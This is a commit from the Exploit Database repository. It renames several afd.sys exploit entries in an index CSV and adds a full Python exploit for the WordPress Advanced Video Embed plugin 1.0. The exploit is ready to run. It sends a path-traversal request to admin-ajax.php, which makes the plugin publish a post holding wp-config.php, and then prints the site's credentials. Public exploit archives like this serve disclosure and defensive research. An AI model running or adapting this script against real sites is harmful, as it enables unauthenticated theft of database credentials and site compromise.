DB: 2016-04-04

1 new exploits Microsoft Windows 2003/XP - AFD.sys Privilege Escalation Exploit (K-plugin) Microsoft Windows 2003/XP - afd.sys Privilege Escalation Exploit (K-plugin) Microsoft Windows XP - AFD.sys Local Kernel DoS Exploit Microsoft Windows XP - afd.sys Local Kernel DoS Exploit Microsoft Windows XP/2003 Afd.sys - Local Privilege Escalation Exploit (MS11-080) Microsoft Windows XP/2003 - afd.sys Local Privilege Escalation Exploit (MS11-080) Microsoft Windows - AFD.SYS Dangling Pointer Privilege Escalation (MS14-040) Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040) Microsoft Windows 7 x64 - AFD.SYS Privilege Escalation (MS14-040) Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040) WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)
dongfengyz · Apr 4, 2016 · 5a85093 · 5a85093
1 parent 3b93501
commit 5a85093
Show file tree

Hide file tree

Showing 2 changed files with 60 additions and 5 deletions.
diff --git a/files.csv b/files.csv
@@ -6324,7 +6324,7 @@ id,file,description,date,author,platform,type,port
 6754,platforms/php/webapps/6754.txt,"My PHP Dating (success_story.php id) SQL Injection Vulnerability",2008-10-14,Hakxer,php,webapps,0
 6755,platforms/php/webapps/6755.php,"PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit",2008-10-14,EgiX,php,webapps,0
 6756,platforms/windows/dos/6756.txt,"VLC 0.9.2 Media Player XSPF Memory Corruption Vulnerability",2008-10-14,"Core Security",windows,dos,0
-6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - AFD.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0
+6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - afd.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0
 6758,platforms/php/webapps/6758.txt,"AstroSPACES (id) Remote SQL Injection Vulnerability",2008-10-15,TurkishWarriorr,php,webapps,0
 6759,platforms/php/webapps/6759.txt,"mystats (hits.php) Multiple Vulnerabilities Exploit",2008-10-15,JosS,php,webapps,0
 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability",2008-10-15,JosS,php,webapps,0
@@ -14914,7 +14914,7 @@ id,file,description,date,author,platform,type,port
 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b - LFI Vulnerability",2011-04-07,Osirys,php,webapps,0
 17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0
 17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart <= 1.1.7 - Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0
-17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - AFD.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0
+17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - afd.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0
 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
 17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
 17136,platforms/php/webapps/17136.txt,"Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability",2011-04-09,eidelweiss,php,webapps,0
@@ -15778,7 +15778,7 @@ id,file,description,date,author,platform,type,port
 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 and 4300 Command Execution",2011-11-30,metasploit,hardware,remote,0
 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability",2011-11-30,Silent_Dream,windows,dos,0
 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit",2011-11-30,"Debasish Mandal",windows,local,0
-18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 Afd.sys - Local Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0
+18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - afd.sys Local Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0
 18177,platforms/php/webapps/18177.txt,"WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities",2011-11-30,EgiX,php,webapps,0
 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u)",2011-11-30,Rh0,windows,local,0
 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller Authentication Bypass Vulnerability",2011-11-30,"Alexey Sintsov",jsp,remote,0
@@ -35688,7 +35688,7 @@ id,file,description,date,author,platform,type,port
 39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow Exploit",2016-02-15,LiquidWorm,windows,local,0
 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - .pgm Crash PoC",2016-02-15,"Shantanu Khandelwal",windows,dos,0
 39445,platforms/linux/dos/39445.c,"Ntpd <= ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
-39446,platforms/win32/local/39446.py,"Microsoft Windows - AFD.SYS Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win32,local,0
+39446,platforms/win32/local/39446.py,"Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win32,local,0
 39447,platforms/windows/dos/39447.py,"Network Scanner Version 4.0.0.0 - SEH Crash POC",2016-02-15,INSECT.B,windows,dos,0
 39448,platforms/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80
 39449,platforms/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0
@@ -35763,7 +35763,7 @@ id,file,description,date,author,platform,type,port
 39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0
 39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,metasploit,windows,local,0
 39524,platforms/php/webapps/39524.js,"ATutor LMS install_modules.php CSRF Remote Code Execution Vulnerability",2016-03-07,mr_me,php,webapps,0
-39525,platforms/win64/local/39525.py,"Microsoft Windows 7 x64 - AFD.SYS Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win64,local,0
+39525,platforms/win64/local/39525.py,"Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win64,local,0
 39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 - 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80
 39529,platforms/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos,0
 39530,platforms/windows/dos/39530.txt,"Avast - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0
@@ -35871,6 +35871,7 @@ id,file,description,date,author,platform,type,port
 39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,metasploit,java,remote,8080
 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0
 39645,platforms/multiple/remote/39645.php,"PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0
+39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)",2016-04-01,"evait security GmbH",php,webapps,80
 39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0
 39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0
 39649,platforms/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0

diff --git a/platforms/php/webapps/39646.py b/platforms/php/webapps/39646.py
@@ -0,0 +1,54 @@
+#!/usr/bin/env python
+
+# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
+# Google Dork: N/A
+# Date: 04/01/2016
+# Exploit Author: evait security GmbH
+# Vendor Homepage: arshmultani - http://dscom.it/
+# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
+# Version: 1.0
+# Tested on: Linux Apache / Wordpress 4.2.2
+
+#	Timeline
+#	03/24/2016 - Bug discovered
+#	03/24/2016 - Initial notification of vendor
+#	04/01/2016 - No answer from vendor, public release of bug 
+
+
+# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:
+
+#  function ave_publishPost(){
+#    $title = $_REQUEST['title'];
+#    $term = $_REQUEST['term'];
+#    $thumb = $_REQUEST['thumb'];
+# <snip>
+# Line 78:
+#    $image_data = file_get_contents($thumb);
+
+
+# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
+
+# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)
+
+import random
+import urllib2
+import re
+
+url = "http://127.0.0.1/wordpress" # insert url to wordpress
+
+randomID = long(random.random() * 100000000000000000L)
+
+objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
+content =  objHtml.readlines()
+for line in content:
+	numbers = re.findall(r'\d+',line)
+	id = numbers[-1]
+	id = int(id) / 10
+
+objHtml = urllib2.urlopen(url + '/?p=' + str(id))
+content = objHtml.readlines()
+
+for line in content:
+	if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
+		urls=re.findall('"(https?://.*?)"', line)
+		print urllib2.urlopen(urls[0]).read()